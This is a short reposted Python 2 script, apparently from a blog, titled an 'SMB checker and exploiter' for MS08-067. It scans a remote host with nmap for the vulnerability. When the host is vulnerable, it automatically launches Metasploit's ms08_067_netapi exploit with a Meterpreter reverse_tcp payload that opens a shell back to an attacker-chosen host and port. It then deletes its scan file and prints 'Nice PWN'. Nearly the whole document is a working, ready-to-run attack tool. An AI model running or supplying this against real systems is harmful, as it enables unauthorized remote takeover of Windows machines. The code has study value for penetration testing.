Python: SMB checker and exploiter ‘MS08-067’

#!/usr/bin/env python
#
# File_Name: SMB checker and exploiter 'MS08-067'
# Written by: Ahmed shawky aka lnxg33k < ahmed@isecur1ty.org >
# Thanks: Dave Relik from #social-engineer --> freenode
# home: live.isecur1ty.org  lnxg33k.wordpress.com
#

import os
import sys
import subprocess
import re

if os.getuid() != 0: 
  print 'requires root privileges.'
  sys.exit(1) 

def usage():
  if len(sys.argv) != 4:
    print 'Usage: ./smb.py [RemoteHost] [LocalHost] [LocalPort]'
    print 'EX)    ./smb.py 192.168.1.50 192.168.1.6 443'
    sys.exit(1)
usage()

print """ 
  ************************************************
  **\tSMB checker and exploiter 'MS08-067' \t**
  **\tWritten by: Ahmed Shawky aka lnxg33k \t**
  **\tThanks: Dave Relik @ #social-engineer\t**
  ************************************************
"""

RHOST = sys.argv[1]
LHOST = sys.argv[2]
LPORT = sys.argv[3]

nmap = subprocess.Popen('nmap -sS -p445 --script smb-check-vulns.nse %s -oN /tmp/nmap.txt' %RHOST, shell=True).wait()

f = open('/tmp/nmap.txt', 'rU')
reader = f.read() 
found = re.search(r'[|]\s\s\sMS08-067:\sVULNERABLE', reader)   #|   MS08-067: VULNERABLE
if not found:
  print '\nSystem is not vulnerable'
  sys.exit(1) 

print '\nLooks like it\'s a vulnerable host'
print 'I will exploit it for you\n'


metasploit = subprocess.Popen('msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=%s LHOST=%s LPORT=%s E' %(RHOST,LHOST,LPORT), shell=True).wait()

print '[**] Nice PWN'
subprocess.Popen('rm -f /tmp/nmap.txt > /dev/null', shell=True).wait()

Notes

  1. opexxx posted this